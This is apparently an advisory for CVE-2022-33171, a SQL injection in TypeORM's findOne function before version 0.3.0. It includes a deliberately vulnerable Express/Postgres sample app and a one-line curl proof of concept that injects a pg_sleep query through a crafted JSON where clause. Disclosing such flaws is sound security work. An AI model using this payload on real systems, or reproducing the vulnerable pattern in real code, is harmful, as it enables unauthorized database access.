TypeORM SQL Injection

TypeORM versions prior to 0.3.0 suffer from a remote SQL injection vulnerability in the findOne function.


SHA-256 | fd166627536e61322f676b3adf3875427b5eb32b7305d966ceefdc69b93b2f39

typeorm CVE-2022-33171

findOne(id), findOneOrFail(id)

The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection.

The issue was already fixed from version 0.3.0 onward when we encountered it.

Maintainer does not consider this a vulnerability and stated the root cause is bad input validation.

On one hand input validation is definitely insufficient. On the other hand this is a function argument that is meant to be fed user input and as such one would think it safe to put user input there.

Vulnerable app:
```

import {
Entity,
PrimaryGeneratedColumn,
Connection,
ConnectionOptions,
Repository,
createConnection
} from 'typeorm';
import * as express from 'express';
import {Application, Request, Response} from 'express';

let connection: Connection;

async function myListener(request: Request, response: Response) {
if(!connection)
connection = await createConnection(connectionOpts);
const userRepo: Repository<User> = connection.getRepository(User);

const ids: string[] = request.body;
for(const id of ids) {
try {
await userRepo.findOne(id);
} catch(err: any) {
console.log(err);
}
}
response.json({});
}

@Entity({ name: 'user' })
class User {
@PrimaryGeneratedColumn('uuid')
id: string;
}

const connectionOpts: ConnectionOptions = {
type: 'postgres',
name: 'myconnection',
host: 'db-host',
port: 5432,
username: 'username',
password: 'password',
database: 'mydb',
schema: 'public',
entities: [User]
}

const app: Application = express();
app.use(express.json());
app.post( "/findByIds", myListener);
app.listen(4444, () => console.log('App started'));

```

Exploit:
curl -v [http://host/findByIds](http://containerip:4444/findByIds)' -H 'Content-Type: application/json' --data '[{"where":"1=1; SELECT pg_sleep(10) --"}]'


Related Posts